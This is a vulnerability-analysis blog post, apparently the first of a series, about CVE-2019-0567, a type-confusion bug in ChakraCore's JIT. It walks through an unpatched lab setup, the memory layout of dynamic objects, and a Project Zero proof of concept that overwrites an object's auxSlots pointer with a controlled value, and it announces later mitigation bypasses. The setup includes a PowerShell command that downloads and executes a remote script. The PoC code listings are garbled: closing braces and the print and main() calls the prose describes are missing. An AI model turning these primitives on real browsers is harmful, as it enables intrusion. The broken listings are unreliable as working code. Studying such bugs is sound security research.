  3. Our initial analysis will be done with the ch.exe application, which is the ChakraCore shell. This is essentially a command-line JavaScript engine that can directly execute JavaScript (just as a browser does). Think of this as the β€œrendering” part of the browser, but without the graphics. Whatever can occur in ch.exe can occur in Edge itself (Chakra-based Edge). Our final exploit, as we will see in part three, will be detonated in Edge itself. However, ch.exe is a very powerful and useful debugging tool.
  4. Chakra, and the open-source twin ChakraCore, are both deprecated in their use with Microsoft Edge. Edge now runs on the V8 JavaScript engine, which is used by Chrome-based browsers.

Finally, from an exploitation perspective, none of what I am doing would have been possible without Bruno Keith’s amazing prior work surrounding Chakra exploit primitives, the Project Zero issues, or the Perception Point blog post.

Configuring a Chakra/ChakraCore Environment

Before beginning, Chakra is the name of the β€œMicrosoft proprietary” JavaScript engine used with Edge before V8. The β€œopen-source” variant is known as ChakraCore. We will reference ChakraCore for this blog post, as the source code is available. CVE-2019-0567 affects both β€œversions”, and at the end we will also port our exploit to actually target Chakra/Edge (we will be doing analysis in ChakraCore).

For the purposes of this blog post, and part two, we will be performing analysis (and exploitation in part two) with the open-source version of Chakra, the ChakraCore JavaScript engine + ch.exe shell. In part three, we will perform exploitation with the standard Microsoft Edge (pre-V8 JavaScript engine) browser and Chakra JavaScript engine

So we can knock out β€œtwo birds with one stone”, our environment needs to first contain a pre-V8 version of Edge, as well as a version of Edge that doesn’t have the patch applied for CVE-2019-0567 (the type confusion vulnerability) or CVE-2017-8637 (our ACG bypass primitive). Looking at the Microsoft advisory for CVE-2019-0567, we can see that the applicable patch is KB4480961. The CVE-2017-8637 advisory can be found here. The applicable patch in this case is KB4034674.

The second β€œbird” we need to address is dealing with ChakraCore.

Windows 10 1703 64-bit is a version of Windows that not only can support ChakraCore, but also comes (by default) with a pre-patched version of Edge via a clean installation. So, for the purposes of this blog post, the first thing we need to do is grab a version of Windows 10 1703 (unpatched with no service packs) and install it in a virtual machine. You will probably want to disable automatic updates, as well. How this version of Windows is obtained is entirely up to the reader.

If you cannot obtain a version of Windows 10 1703, another option is to just not worry about Edge or a specific version of Windows. We will be using ch.exe, the ChakraCore shell, along with the ChakraCore engine to perform vulnerability analysis and exploit development. In part two, our exploit will be done with ch.exe. Part three is entirely dedicated to Microsoft Edge. If installation of Edge proves to be too much of a hassle, the β€œgritty” details about the exploit development process will be in part two. Do be warned, however, that Edge contains a few more mitigations that make exploitation much more arduous. Because of this, I highly recommend you get your hands on the applicable image to follow along with all three posts. However, the exploit primitives are identical between a ch.exe environment and an Edge environment.

After installing a Windows 10 1703 virtual machine (I highly recommend making the hard drive 100GB at least), the next step for us will be installing ChakraCore. First, we need to install git on our Windows machine. This can be done most easily by quickly installing Scoop.sh via PowerShell and then using a PowerShell web cradle to execute scoop install git from the PowerShell prompt. To do this, first run PowerShell as an administrator and then execute the following commands:

  1. Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser (then enter a to say β€œYes to All”)
  2. [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
  3. Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://get.scoop.sh')
  4. scoop install git

After git is installed, you will need to also download Microsoft Visual Studio. Visual Studio 2017 works just fine and I have included a direct download link from Microsoft here. After downloading, just configure Visual Studio to install Desktop development with C++ and all corresponding defaults.

After git and Visual Studio are installed, we can go ahead and install ChakraCore. ChakraCore is a full fledged JavaScript environment with a runtime, etc. so it is quite hefty and may take a few seconds when cloning the repository. Open up a cmd.exe prompt and execute the following commands:

  1. cd C:\Wherever\you\want\to\install
  2. git clone https://github.com/Microsoft/ChakraCore.git
  3. cd ChakraCore
  4. git checkout 331aa3931ab69ca2bd64f7e020165e693b8030b5 (this is the commit hash associated with the vulnerability)

After ChakraCore is downloaded, and the vulnerable commit β€œchecked out”, we need to configure ChakraCore to compile with Control Flow Guard (CFG). To do this, go to the ChakraCore folder and open the Build directory. In there, you will see a Visual Studio Solution file. Double-click and select β€œVisual Studio 2017” (this is not a β€œrequired” step, but we want to add CFG as a mitigation we have to eventually bypass!).

Note that when Visual Studio opens it will want you to sign in with an account. You can bypass this by telling Visual Studio you will do it later, and you will then get 30 days of unfettered access.

At the top of the Visual Studio window, select x64 as such. Make sure to leave Debug as is.

After selecting x64, click Project > Properties in Visual Studio to configure ChakraCore properties. From here, we want to select C/C++ > All Options and turn on Control Flow Guard. Then, press Apply then Ok.

Click File > Save All in Visual Studio to save all of our changes to the solution.

We now need to open up a x64 Native Tools Command Prompt for VS 2017 prompt. To do this, hit the Windows key and start typing in x64 Native Tools Command.

Lastly, we need to actually build the project by executing the following the command: msbuild /m /p:Platform=x64 /p:Configuration=Debug Build\Chakra.Core.sln (note that if you do not use a x64 Native Tools Command Prompt for VS 2017 prompt, msbuild won’t be a valid command).

These steps should have installed ChakraCore on your machine. We can validate this by opening up a new cmd.exe prompt and executing the following commands:

  1. cd C:\path\to\ChakraCore
  2. cd Build\VcBuild\bin\x64_debug\
  3. ch.exe --version

We can clearly see that the ChakraCore shell is working, and the ChakraCore engine (chakracore.dll) is present! Now that we have Edge and ChakraCore installed, we can begin our analysis by examining how JavaScript objects are laid out in memory within Chakra/ChakraCore and then exploitation!

JavaScript Objects - Chakra/ChakraCore Edition

The first key to understanding modern vulnerabilities, such as type confusion, is understanding how JavaScript objects are laid out in memory. As we know, in a programming language like C, explicit data types are present. int var and char* string are two examples - the first being an integer and the second being an array of characters, or chars. However, in ChakraCore, objects can be declared as such: var a = {o: 1, b: 2} or a = "Testing". How does JavaScript know how to treat/represent a given object in memory when there is no explicit data type information? This is the job of ChakraCore - to determine the type of object being used and how to update and manage it accordingly.

All the information I am providing, about JavaScript objects, is from this blog, written by a developer of Chakra. While the linked blog focuses on both β€œstatic” and β€œdynamic” objects, we will be focusing on specifically how ChakraCore manages dynamic objects, as static objects are pretty straight forward and are uninteresting for our purposes.

So firstly, what is a dynamic object? A dynamic object is pretty much any object that can’t be represented by a β€œstatic” object (static objects consists of data types like numbers, strings, and booleans). For example, the following would be represented in ChakraCore as a dynamic object:

let dynamicObject = {a: 1, b:2};
dynamicObject.a = 2;			// Updating property a to the value of 2 (previously it was 1)
dynamicObject.c = "string";		// Adding a property called c, which is a string

print(dynamicObject.a);			// Print property a (to print, ChakraCore needs to retrieve this property from the object)
print(dynamicObject.c);			// Print property c (to print, ChakraCore needs to retrieve this property from the object)

You can see why this is treated as a dynamic object, instead of a static one. Not only are two data types involved (property a is a number and property c is a string), but they are stored as properties (think of C-structures) in the object. There is no way to account for every combination of properties and data types, so ChakraCore provides a way to β€œdynamically” handle these situations as they arise (a la β€œdynamic objects”).

ChakraCore has to treat these objects different then, say, a simple let a = 1 static object. This β€œtreatment” and representation, in memory, of a dynamic object is exactly what we will focus on now. Having said all of that - exactly how does this layout look? Let’s cite some examples below to find out.

Here is the JavaScript code we will use to view the layout in the debugger:

let a = {b: 1, c: 2};

What we will do here is save the above code in a script called test.js and set a breakpoint on the function ch!WScriptJsrt::EchoCallback within ch.exe. The EchoCallback function is responsible for print() operations, meaning this is synonymous with setting a breakpoint in ch.exe to break every time print() is called (yes, we are using this print statement to aid in debugging). After setting the breakpoint, we can resume execution and break on EchoCallback.

Now that we have hit our breakpoint, we know that anything that happens after this point should involve the JavaScript code after the print() statement from test.js. The reason we do this is because the next function we are going to inspect is constantly called in the background, and we want to ensure we are just checking the specific function call (coming up next) that corresponds to our object creation, to examine it in memory.

Now that we have reached the EchoCallback breakpoint, we need to now set a breakpoint on chakracore!Js::DynamicTypeHandler::SetSlotUnchecked. Note that chakracore.dll isn’t loaded into the process space upon ch.exe executing, and is only loaded after our previous execution.

Once we hit chakracore!Js::DynamicTypeHandler::SetSlotUnchecked, we can finally start examining our object. Since we built ChakraCore locally, as well, we have access to the source code. Both WinDbg and WinDbg Preview should populate the source upon execution on this function.

This code may look a bit confusing. That is perfectly okay! Just know this function is responsible for filling out dynamic objects with their needed property values (in this case, values provided by us in test.js via a.b and a.c).

Right now the object we are dealing with is in the RCX register (per __fastcall we know RCX is the DynamicObject * instance parameter in the source code). This can be seen in the next image below. Since the function hasn’t executed yet, this value in RCX is currently just a blank β€œskeleton” a object waiting to be filled.

We know that we are setting two values in the object a, so we need to execute this function twice. To do this, let’s first preserve RCX in the debugger and then execute g once in WinDbg, which will set the first value, and then we will execute the function again, but this time with the command pt to break before the function returns, so we can examine the object contents.

Perfect. After executing our function twice, but just before the function returns, let’s inspect the contents of what was previously held in RCX (our a object).

The first thing that stands out to us is that this is seemingly some type of β€œstructure”, with the first 0x8 bytes holding a pointer to the DynamicObject virtual function table (vftable). The second 0x8 bytes seem to be some pointer within the same address space we are currently executing in. After this, we can see our values 1 and 2 are located 0x8 and 0x10 bytes after the aforementioned pointer (and 0x10/0x18 bytes from the actual beginning of our β€œstructure”). Our values also have a seemingly random 1 in them. More on this in a moment.

Recall that object a has two properties: b (set to 1) and c (set to 2). They were declared and initialized β€œinline”, meaning the properties were assigned a value in the same line as the object actually being instantiated (let a = {b: 1, c: 2}). Dynamic objects with inlined-properties (like in our case) are represented as follows:

Note that the property values are written to the dynamic object at an offset of 0x10.

If we compare this prototype to the values from WinDbg, we can confirm that our object is a dynamic object with inlined-properties! This means the previous seemingly β€œrandom” pointer after the vftable is actually the address of data structure known as a type in ChakraCore. type isn’t too important to us, from an exploitation perspective, other than we should be aware this address contains data about the object, such as knowing where properties are stored, the TypeId (which is an internal representation ChakraCore uses to determine if the object is a string, number, etc.), a pointer to the JavaScript library, and other information. All information can be found in the ChakraCore code base.

Secondly, let’s go back for a second and talk about why our property values have a random 1 in the upper 32-bits (001000000000001). This 1 in the upper 32-bits is used to β€œtag” a value in order to mark it as an integer in ChakraCore. Any value that is prepended with 00100000 is an integer in ChakraCore. How is this possible? This is because ChakraCore, and most JavaScript engines, only allow 32-bit values, excluding pointers (think of integers, floats, etc.). However, an example of an object represented via a pointer would be a string, just like in C where a string is an array of characters represented by a pointer. Another example would be declaring something like an ArrayBuffer or other JavaScript object, which would also be represented by a pointer.

Since only the lower 32-bits of a 64-bit value (since we are on a 64-bit computer) are used, the upper 32-bits (more specifically, it is really only the upper 17-bits that are used) can be leveraged for other purposes, such as this β€œtagging” process. Do not over think this, if it doesn’t make sense now that is perfectly okay. Just know JavaScript (in ChakraCore) uses the upper 17-bits to hold information about the data type of the object (or property of a dynamic object in this case), excluding types represented by pointers as we mentioned. This process is actually referred to as β€œNaN-boxing”, meaning the upper 17-bits of a 64-bit value (remember we are on a 64-bit system) are reserved for providing type information about a given value. Anything else that doesn’t have information stored in the upper 17-bits can be treated as a pointer.

Let’s now update our test.js to see how an object looks when inline properties aren’t used.

let a = {};
a.b = 1;
a.c = 2;
a.d = 3;
a.e = 4;

What we will do here is restart the application in WinDbg, clear the second breakpoint (the breakpoint on chakracore!Js::DynamicTypeHandler::SetSlotUnchecked), and then let execution break on the print() operation again.

After landing on the print() breakpoint, we will now re-implement the breakpoint on chakracore!Js::DynamicTypeHandler::SetSlotUnchecked, resume execution to hit the breakpoint, examine RCX (where our dynamic object should be, if we recall from the last object we debugged), and execute the SetSlotUnchecked function to see our property values get updated.

Now, according to our debugging last time, this should be the address of our object in RCX. However, taking a look at the vftable in this case we can see it points to a GlobalObject vftable, not a DynamicObject vftable. This is indicative the breakpoint was hit, but this isn’t the object we created. We can simply just hit g in the debugger again to see if the next call will act on our object. Finding this out is simply just a matter of trial and error by looking in RCX to see if the vftable comes from DynamicObject. Another good way to identify if this is our object or not is to see if everything else in the object, outside of the vftable and type, are set to 0. This could be indicative this was newly allocated memory and isn’t filled out as a β€œfull” dynamic object with property values set.

Pressing g again, we can see now we have found our object. Notice all of the memory outside of the vftable and type is initialized to 0, as our property values haven’t been set yet.

Here we can see a slightly different layout. Where we had the value 1 last time, in our first β€œinlined” property, we now see another pointer in the same address space as type. Examining this pointer, we can see the value is 0.

Let’s press g in WinDbg again to execute another call to chakracore!Js::DynamicTypeHandler::SetSlotUnchecked to see how this object looks after our first value is written (1) to the object.

Interesting! This pointer, after type (where our β€œinlined” dynamic object value previously was), seems to contain our first value of a.b = 1!

Let’s execute g two more times to see if our values keep getting written to this pointer.

We can clearly see our values this time around, instead of being stored directly in the object, are stored in a pointer under type. This pointer is actually the address of an array known in ChakraCore as auxSlots. auxSlots is an array that is used to hold property values of an object, starting at auxSlots[0] holding the first property value, auxSlots[1] holding the second, and so on. Here is how this looks in memory.

The main difference between this and our previous β€œinlined” dynamic object is that now our properties are being referenced through an array, versus directly in the object β€œbody” itself. Notice, however, that whether a dynamic object leverages the auxSlots array or inlined-properties - both start at an offset of 0x10 within a dynamic object (the first inline property value starts at dynamic_object+0x10, and auxSlots also starts at an offset of 0x10).

The ChakraCore codebase actually has a diagram in the comments of the DynamicObject.h header file with this information.

However, we did not talk about β€œscenario #2” in the above image. We can see in #2 that it is also possible to have a dynamic object that not only has an auxSlots array which contain property values, but also inlined-properties set directly in the object. We will not be leveraging this for exploitation, but this is possible if an object starts out with a few inlined-properties and then later on other value(s) are added. An example would be:

let a = {b: 1, c: 2, d: 3, e: 4};
a.f = 5;

Since we declared some properties inline, and then we also declared a property value after, there would be a combination of property values stored inline and also stored in the auxSlots array. Again, we will not be leveraging this memory layout for our purposes but it has been provided in this blog post for continuity purposes and to show it is possible.

CVE-2019-0567: An Analysis of a Browser-Based Type Confusion Vulnerability

Building off of our understanding of JavaScript objects and their layout in memory, and with our exploit development environment configured, let’s now put these theories in practice.

Let’s start off by executing the following JavaScript in ch.exe. Save the following JavaScript code in a file named poc.js and run the following command: ch.exe C:\Path\to\poc.js. Please note that the following proof-of-concept code comes from the Google Project Zero issue, found here. Note that there are two proofs-of-concepts here. We will be using the latter one (PoC for InitProto).

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    opt(o, o, 0x1234);



As we can see from the image above, when our JavaScript code is executed, an access violation occurs! This is likely due to invalid memory being accessed. Let’s execute this script again, but this time attached to WinDbg.

Executing the script, we can see the offending instruction in regards to the access violation.

Since ChakraCore is open-sourced, we can also see the corresponding source code.

Moving on, let’s take a look at the disassembly of the crash.

We can clearly see an invalid memory address (in this case 0x1234) is being accessed. Obviously we can control this value as an attacker, as it was supplied by us in the proof-of-concept.

We can also see an array is being referenced via [rcx+rax*0x8]. We know this, as we can see in the source code an auxSlots array (which we know is an array which manages property values for a dynamic JavaScript object) is being indexed. Even if we didn’t have source code, this assembly procedure is indicative of an array index. RCX in this case would contain the base address of the array with RAX being the index into the array. Multiplying the value by the size of a 64-bit address (since we are on a 64-bit machine) allows the index to fetch a given address instead of just indexing base_address+1, base_address+2, etc.

Looking a bit earlier in the disassembly, we can see the the value in RCX, which should have been the base address of the array, comes from the value rsp+0x58.

Let’s inspect this address, under greater scrutiny.

Does this β€œstructure prototype” look familiar? We can see a virtual function table for a DynamicObject, we see what seems to be a type pointer, and see the value of a property we provided in the poc.js script, 0x1234! Let’s cross-reference what we are seeing with what our script actually does.

First, a loop is created that will execute the opt() function 2000 times. Additionally, an object called o is created with properties a and b set (to 1 and 2, respectively). This is passed to the opt() function, along with two empty values of {}. This is done as such: opt(o, {}, {}).

    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

Secondly, the function opt() is actually executed 2000 times as opt(o, {}, {}). The below code snippet is what happens inside of the opt() function.

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

Let’s start with what happens inside the opt() function.

When opt(o, {}, {}) is executed the first argument, an object o (which is created before each function call as let o = {a: 1, b: 2};) has property b set to 1 (o.b = 1;) in the first line of opt(). After this, tmp (a function in this case) has its prototype set to whatever value was provided by proto.

In JavaScript, a prototype is a built-in property that can be assigned to a function. The purpose of it, for legitimate uses, is to provide JavaScript with a way to add new properties at a later stage, to a function, which will be shared across all instances of that function. Do not worry if this sounds confusing, we just need to know a prototype is a built-in property that can be attributed to a function. The function in this case is named tmp.

As a point of contention, executing let tmp = {__proto__: proto}; is the same as executing tmp.prototype = proto.

When opt(o, {}, {}) is executed, we are providing the function with two NULL values. Since proto, which is supplied by the caller, is set to a NULL value, the prototype property of the tmp function is set to 0. When this occurs in JavaScript, the corresponding function (tmp in this case) is created without a prototype. In essence, all opt() is doing is the following:

  1. Set o’s (provided by the caller) a and b properties
  2. b is set to 1 (it was initially 2 when the o object was created via let o = {a: 1, b: 2})
  3. A function named tmp is created, and its prototype property is set to 0, which essentially means create tmp without a prototype
  4. o.a is set to the value provided by the caller through the value parameter. Since we are executing the function as opt(o, {}, {}), the o.a property will also be 0

The above code is executed 2000 times. What this does is let the JavaScript engine know that opt() has become what is known as a β€œhot” function. A β€œhot” function is one that is recognized by JavaScript as being executed constantly (in this case, 2000 times). This instructs ChakraCore to have this function go through a process called Just-In-Time compilation (JIT), where the above JavaScript is converted from interpreted code (essentially byte code) to actually compiled as machine code, such as a C .exe binary. This is done to increase performance, as this function doesn’t have to go through the interpretation process (which is beyond the scope of this blog post) every time it is executed. We will come back to this in a few moments.

After opt() is called 2000 times (this also means opt continues to be optimized for subsequent future function calls), the following happens:

let o = {a: 1, b: 2};

opt(o, o, 0x1234);


For continuity purposes, let’s also display opt() again.

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

Taking a look at the second snippet of code (not the above opt() function, but the snippet above that which calls opt() as opt(o, o, 0x1234)), we can see it starts out by declaring an object o again. Notice that object o is declared with inlined-properties. We know this will be represented in memory as a dynamic object.

After o is instantiated as a dynamic object with inlined-properties, it is passed to the opt() function in both the o and proto parameters. Additionally, a value of 0x1234 is provided.

When the function call opt(o, o, 0x1234) occurs, the o.b property is set to 1, just like last time. However, this time we are not supplying a blank prototype property, but we are supplying the o dynamic object (with inlined-properties) as the prototype for the function tmp. This essentially sets tmp.prototype = o;, and let’s JavaScript know the prototype of the tmp function is now the dynamic object o. Additionally, the o.a property (which was previously 1 from the o object instantiation) is set to value, which is provided by us as 0x1234. Let’s talk about what this actually does.

We know that a dynamic object o was declared with inlined-properties. We also know that these types of dynamic objects are laid out in memory, as seen below.

Skipping over the prototype now, we also can see that o.a is set. o.a was a property that was present when the object was declared, and is represented in the object directly, since is was declared inline. So essentially, here is how this should look in memory.

When the object is instantiated (let o = {a: 1, b: 2}):

When o.b and o.a are updated via the opt() function (opt(o, o, 0x1234):

We can see that JavaScript just acted directly on the already inlined-values of 1 and 2 and simply just overwrote them with the values provided by opt() to update the o object. This means that when ChakraCore updates objects that are of the same type (e.g. a dynamic object with inlined-properties), it does so without needing to change the type in memory and just directly acts on the property values within the object.

Before moving on, let’s quickly recall a snippet of code from the JavaScript dynamic object analysis section.

let a = {b: 1, c: 2, d: 3, e: 4};
a.f = 5;

Here a is created with many inlined-properties, meaning 1, 2, 3, and 4 are all stored directly within the a object. However, when the new property of a.f is added after the instantiation of the object a, JavaScript will convert this object to reference data via an auxSlots array, as the layout of this object has obviously changed with the introduction of a new property which was not declared inline. We can recall how this looks below.

This process is known as a type transition, where ChakraCore/Chakra will update the layout of a dynamic object, in memory, based on factors such as a dynamic object with inlined-properties adding a new property which is not declared inline after the fact.

Now that we have been introduced to type transitions, let’s now come back to the following code in our analysis (opt() function call after the 2000 calls to opt() and o object creation)

let o = {a: 1, b: 2};

opt(o, o, 0x1234);

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

We know that in the opt() function, o.a and o.b are updated as o.a = 0x1234 and o.b = 1;. We know that these properties should get updated in memory as such:

However, we didn’t talk about the let tmp = {__proto__: proto}; line.

Before, we supplied the value of tmp.prototype with a value of proto. In this case, this will perform the following:

tmp.prototype = o

This may seem very innocent at first, but this is actually where our vulnerability occurs. When a function has its prototype set (e.g. tmp.prototype = o) the object which will become the prototype (in this case, our object o, since it is assigned to tmp’s prototype property) has to first go through a type transition. This means that o will no longer be represented in memory with inlined-values and instead will be updated to use auxSlots to access properties for the object.

Before transition of o (o.b = 1 occurs before the type transition, so it is still updated inline):

After transition of o:

However, since opt() has gone through the JIT process, it has been turned into machine code. JavaScript interpreters normally perform various type checks before accessing a given property. These are known as guardrails. However, since opt() was marked as β€œhot”, it is now represented in memory as machine code, just how any other C/C++ binary is. The guardrails for typed checks are now gone. The reason they are gone is for a reason known as speculative JIT, where since the function was executed a great number of times (2000 in this case) the JavaScript engine can assume that this function call is only going to be called with the object types that have been seen thus far. In this case, since opt() has only see 2000 calls thus far as opt(o, {}, {}) it assumes that future calls will also only be called as such. However, on the 2001st call, after the function opt() has been compiled into machine code and lost the β€œguardrails”, we call the function as such opt(o, o, 0x1234).

The speculation that opt() is making is that o will always be represented in memory as an object with only inlined-properties. However, since the tmp function now has an actual prototype property (instead of a blank one of {}, which really is ignored by JavaScript and let’s the engine know tmp doesn’t have a prototype), we know this process performs a type transition on the object which is assigned as the prototype for the corresponding function (e.g. the prototype for tmp is now o. o must now undergo a type transition).

Since o now goes under a type transition, and opt() doesn’t consider that o could have gone through a type transition, a β€œtype confusion” can, and does occur here. After o goes through a type transition, the o.a property is updated to 0x1234. The opt() function only knows that if it sees an o object, it should treat the properties as inline (e.g. set them directly in the object, right after the type pointer). So, since we set o.a to 0x1234 inside the opt() function, after it is β€œJIT’d”, opt() gladly write the value of 0x1234 to the first inlined-property (since o.a was the first property created, it is stored right under the type pointer). However, this has a devastating effect, because o is actually laid out in memory as having an auxSlots pointer, as we know.

So, when the o.a property is updated (opt() thinks the layout in memory is | vftable | type | o.a | o.b, when in reality it is | vftable | type | auxSlots |) opt() doesn’t know that o now stores properties via the auxSlots (which is stored at offset 0x10 within a dynamic object) and it writes 0x1234 to where it thinks it should go, and that is the first inlined-property (WHICH IS ALSO STORED AT offset 0x10 WITHIN A DYNAMIC OBJECT)!

opt() thinks it is updating o as such (because JIT speculation told the function o should always have inline properties):

However, since o is laid out in memory as a dynamic object with an auxSlots pointer, this is actually what happens:

The result of the β€œtype confusion” is that the auxSlots pointer was corrupted with 0x1234. This is because the first inlined-property of a dynamic object is stored at the same offset in the dynamic object as another object that uses an auxSlots array. Since β€œno one” told opt() that o was laid out in memory as an object with an auxSlots array, it still thinks o.a is stored inline. Because of this, it writes to dynamic_object+0x10, the location where o.a used to be stored. However, since o.a is now stored in an auxSlots array, this overwrites the address of the auxSlots array with the value 0x1234.

Although this is where the vulnerability takes place, where the actual access violation takes place is in the print(o.a) statement, as seen below.

opt(o, o, 0x1234); 	// Overwrite auxSlots with the value 0x1234

print(o.a);			// Try to access o.a

The o object knows internally that it is now represented as a dynamic object that uses an auxSlots array to hold its properties, after the type transition via tmp.prototype. So, when o goes to access o.a (since the print() statement requires is) it does so via the β€œauxSlots” pointer. However, since the auxSlots pointer was overwritten with 0x1234, ChakraCore is attempting to dereference the memory address 0x1234 (because this is where the auxSlots pointer should be) in pursuit of o.a (since we are asking ChakraCore to retrieve said value for usage with print()).

Since ChakraCore is also open-sourced, we have access to the source code. WinDbg automatically populates the corresponding source code (which we have seen earlier). Referencing this, we can see that, in fact, ChakraCore is accessing (or attempting to) an auxSlots array.

We also know that auxSlots is a member of a dynamic object. Looking at the first parameter of the function where the access violation occurs (DynamicTypeHandler::GetSlot), we can see a variable named instance is passed in, which is of type DynamicObject. This instance is actually the address of our o object, which is also of DynamicObject. A value of index is also passed in, which is the index into the auxSlots array we want to fetch a value from. Since o.a is the first property of o, this would be at auxSlots[0]. This GetSlots function, therefore, is a function that is capable of retrieving a given property of an object which stores properties via auxSlots.

Although we know now exactly how our vulnerability works, it is still worthwhile setting some breakpoints to see the exact moment where auxSlots is corrupted. Let’s update our poc.js script with a print() debug statement.

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    // Adding a debug print statement

    opt(o, o, 0x1234);



Running the script in WinDbg, let’s first set a breakpoint on our print statement. This ensures any functions which act on a dynamic object should act on our object o.

Quickly, let’s reference the Google Project Zero original vulnerability disclosure issue here. The vulnerability description says the following:

NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but actually they can have via the SetIsPrototype method of the type handler that can cause transition to a new type. This can lead to type confusion in the JITed code.

We know here that InitProto is a function that will be executed, due to our setting of the tmp function’s .prototype property. As called out in the above snippet, this function internally invokes a method (function) called SetIsPrototype, which eventually is responsible to transitioning the type of the object used as the prototype for a function (in this case, it means o will be type-transitioned).

Knowing this, and knowing we want to see exactly where this type transition occurs, to confirm that this in fact is the case and ultimately how our vulnerability comes about, let’s set a breakpoint on this SetPrototype method within chakracore!Js::DynamicObject (since we are dealing with a dynamic object). Please note we are setting a breakpoint on SetPrototype instead of SetIsPrototype, as SetIsPrototype is eventually invoked within the call stack of SetPrototype. Calling SetPrototype eventually will call SetIsPrototype.

After hitting chakracore!Js::DynamicObject::SetPrototype, we can see that our o object, pre-type transition, is currently in the RDX register.

We know that we are currently executing within a function that at some point, likely as a result of an internal call within SetPrototype, will transition o from an object with inlined-properties to an object that represents its properties via auxSlots. We know that the auxSlots array is always located at offset 0x10 within a dynamic object. Since we know our object must get transitioned at some point, let’s set a hardware breakpoint to tell WinDbg to break when o+0x10 is written to at an 8 byte (1 QWORD, or 64-bit value) boundary to see exactly where the transition happens at in ChakraCore.

As we can see, WinDbg breaks within a function called chakracore!Js::DynamicTypeHandler::AdjustSlots. We can see more of this function below.

Let’s now examine the call stack to see how exactly execution arrived at this point.

Interesting! As we can see above, the InitProto function (called OP_InitProto) internally invokes a function called ChangePrototype which eventually invokes our SetPrototype function. SetPrototype, as we mentioned earlier, invokes the SetIsPrototype function referred to in the Google Project Zero issue. This function performs a chain of function calls which eventually lead execution to where we are currently, AdjustSlots.

As we also know, we have access to the source code of ChakraCore. Let’s examine where we are within the source code of AdjustSlots, where our hardware breakpoint broke.

We can see object (presumably our dynamic object o) now has an auxSlots member. This value is set by the value newAuxSlots. Where does newAuxSlots come from? Taking a look a bit further up in the previous image, we can see a value called oldInlineSlots, which is an array, is assigned to the value newAuxSlots.

This is very interesting, because as we know from our object o before the type transition, this object is one with inlined-properties! This function seems to convert an object with inlined-property values to one represented via auxSlots!

Let’s quickly recall the disassembly of AdjustSlots.

Looking above, we can see that above the currently executing instruction of mov rax, qword ptr [rsp+0F0h] is an instruction of mov qword [rax+10h], rcx. Recall that an auxSlots pointer is stored at an offset of 0x10 within a dynamic object. This instruction is very indicative that our o object is within RAX and the value at 0x10 (where o.a, the first inlined-property, was stored as the first inlined-property is always stored at dynamic_object+0x10 inside an object represented in this manner). This value is assigned the current value of RCX. Let’s examine this in the debugger.

Perfect! We can see in RCX our inlined-property values of o.a and o.b! These values are stored in a pointer, 000001229cd38200, which is the value in RCX. This is actually the address of our auxSlots array that will be assigned to our object o as a result of the type-transition! We can see this as RAX currently contains our o object, which has now been transitioned to an auxSlots variant of a dynamic object! We can confirm this by examining the auxSlots array located at o+0x10! Looking at the above image, we can see that our object was transitioned from an inlined-property represented object to one with properties held in an auxSlots array!

Let’s set one more breakpoint to confirm this 100 percent by watching the value, in memory, being updated. Let’s set a breakpoint on the mov qword [rax+10h], rcx instruction, and remove all other breakpoints (except our print() debugging breakpoint). We can easily do this by removing breakpoints and leveraging the .restart command in WinDbg to restart execution of ch.exe (please note that the below image bay be low resolution. Right click on it and open it in a new tab to view it if you have trouble seeing it).

After hitting the print() breakpoint, we can simply continue execution to our intended breakpoint by executing g.

We can see that in WinDbg, we actually break a few instructions before our intended breakpoint. This is perfectly okay, and we can set another breakpoint on the mov qword [rax+10h], rcx instruction we intend to examine.

We then can hit our next breakpoint to see the state of execution flow when the mov qword [rax+10h], rcx instruction is reached.

We then can examine RAX, our o object, before and after execution of the above instruction to see that our object is updated from an inlined-represented dynamic object to one that leverages an auxSlots array!

Examining the auxSlots array, we can see our a and b properties!

Perfect! We now know our o object is updated in memory, and its layout has changed. However, opt() isn’t aware of this type change, and will still execute the o.a = value (where value is 0x1234) instruction as though o hasn’t been type transitioned. opt() still thinks o is represented in memory as a dynamic object with inlined-properties! Since we know inlined-properties are also stored at dynamic_object+0x10, opt() will execute the o.a = value instruction as if our auxSlots array doesn’t exist (because it doesn’t know it does because the JIT-compilation process told opt() not to worry about what type o is!). This means it will directly overwrite our auxSlots pointer with a value of 0x1234! Let’s see this in action.

To do this, let’s clear all breakpoints and start a brand new, fresh instance of ch.exe in WinDbg by either leveraging .restart or just closing and opening WinDbg again. After doing so, set a breakpoint on our print() debug function, ch!WScriptJsrt::EchoCallback.

Let’s now set a breakpoint on the function we know performs the type-transition on our object, bp chakracore!Js::DynamicTypeHandler::AdjustSlots.

Let’s again examine the callstack.

Notice the memory address right before our call to OP_InitProto, which we have already examined. The address below is the address of the function which initiated a call to OP_InitProto, but we can see there is no corresponding symbol. If we perform !address on this memory address, we can also see that there is no corresponding image name or usage for this address.

What we are seeing is JIT in action. This memory address is the address of our opt() function. The reason why there are no corresponding symbols to this function, is because ChakraCore optimized this function into actual machine code. We no longer have to go through any of the ChakraCore functions/APIs used to set properties, update properties, etc. ChakraCore leveraged JIT to compile this function into machine code that can directly act on memory addresses, just like C does when you do something like below:


// Set a.Member1
a.Member1 = 0x1234;

The way this is achieved in Microsoft Edge is through a process known as out-of-process JIT compilation. The Edge β€œJIT server” is a separate process from the actual β€œrenderer” or β€œcontent” process, which is the process a user interfaces with. When a function is JIT-compiled, it is injected into the content process from the JIT server (we will abuse this with an Arbitrary Code Guard (ACG) bypass in the third post. Note also that the ACG bypass we will use has since been patched as of Windows 10 RS4) after it is optimized.

